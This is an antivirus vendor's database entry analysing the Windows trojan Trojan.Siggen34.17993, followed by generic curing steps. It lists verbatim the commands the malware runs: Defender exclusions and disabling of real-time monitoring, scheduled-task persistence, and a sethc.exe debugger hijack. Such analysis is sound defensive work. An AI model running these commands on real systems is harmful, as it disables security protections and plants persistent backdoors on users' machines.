La mia libreria
La mia libreria

+ Aggiungi alla libreria

Supporto
Supporto 24/7 | Regole per contattare

Richieste

Profile

Trojan.Siggen34.17993

Aggiunto al database dei virus Dr.Web: 2026-09-21

La descrizione è stata aggiunta:

Technical Information

To ensure autorun and distribution
Modifies the following registry keys
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'WindowsUpdate' = '%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe'
Creates or modifies the following files
  • %APPDATA%\microsoft\windows\start menu\programs\startup\windowsupdate.exe
  • <SYSTEM32>\tasks\windowsupdate
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '<Full path to file>' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%WINDIR%\Temp' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'svchost.exe' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'WindowsUpdate.exe' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue"
Patches code
in AMSI dll
  • qgkccck.exe process, Amsi.dll module
in NTDLL dll
  • qgkccck.exe process, ntdll.dll module
Modifies file system
Creates the following files
  • %TEMP%\mc_av.ps1
  • nul
  • %ALLUSERSPROFILE%\microsoft\windows\caches\svchost.exe
  • %TEMP%\mc_wmi.ps1
Sets the 'hidden' attribute to the following files
  • %ALLUSERSPROFILE%\microsoft\windows\caches\svchost.exe
Deletes following files that it created itself
  • %TEMP%\mc_av.ps1
  • %TEMP%\mc_wmi.ps1
Network activity
Connects to
  • 'ip##pi.com':80
  • '85.##.167.71':80
TCP
HTTP GET requests
  • http://ip##pi.com/json/?fi#####################################################################################
Other
  • '85.##.167.71':80
UDP
  • DNS ASK ip##pi.com
Miscellaneous
Creates and executes the following
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_av.ps1"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_wmi.ps1"
Executes the following
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_av.ps1"
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '<Full path to file>' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "<Full path to file>" /t REG_DWORD /d 0 /f 2>nul
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "<Full path to file>" /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches" /t REG_DWORD /d 0 /f 2>nul
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches" /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /t REG_DWORD /d 0 /f 2>nul
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%WINDIR%\Temp' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%WINDIR%\Temp" /t REG_DWORD /d 0 /f 2>nul
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%WINDIR%\Temp" /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_DWORD /d 0 /f 2>nul
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'svchost.exe' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "svchost.exe" /t REG_DWORD /d 0 /f 2>nul
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "svchost.exe" /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'WindowsUpdate.exe' -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "WindowsUpdate.exe" /t REG_DWORD /d 0 /f 2>nul
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "WindowsUpdate.exe" /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue"
  • '<SYSTEM32>\cmd.exe' /c wmic path win32_VideoController get name
  • '<SYSTEM32>\wbem\wmic.exe' path win32_VideoController get name
  • '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "WindowsUpdate" /tr "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /sc onlogon /rl highest /f
  • '<SYSTEM32>\schtasks.exe' /create /tn "WindowsUpdate" /tr "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /sc onlogon /rl highest /f
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_wmi.ps1"
  • '<SYSTEM32>\wbem\wmiapsrv.exe'
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /f
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_av.ps1"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '<Full path to file>' -ErrorAction SilentlyContinue"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "<Full path to file>" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches' -ErrorAction SilentlyContinue"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe' -ErrorAction SilentlyContinue"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%WINDIR%\Temp' -ErrorAction SilentlyContinue"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%WINDIR%\Temp" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public' -ErrorAction SilentlyContinue"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'svchost.exe' -ErrorAction SilentlyContinue"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "svchost.exe" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess 'WindowsUpdate.exe' -ErrorAction SilentlyContinue"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes" /v "WindowsUpdate.exe" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c wmic path win32_VideoController get name' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "WindowsUpdate" /tr "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /sc onlogon /rl highest /f' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -File "%TEMP%\mc_wmi.ps1"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "%ALLUSERSPROFILE%\Microsoft\Windows\Caches\svchost.exe" /f' (with hidden window)

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android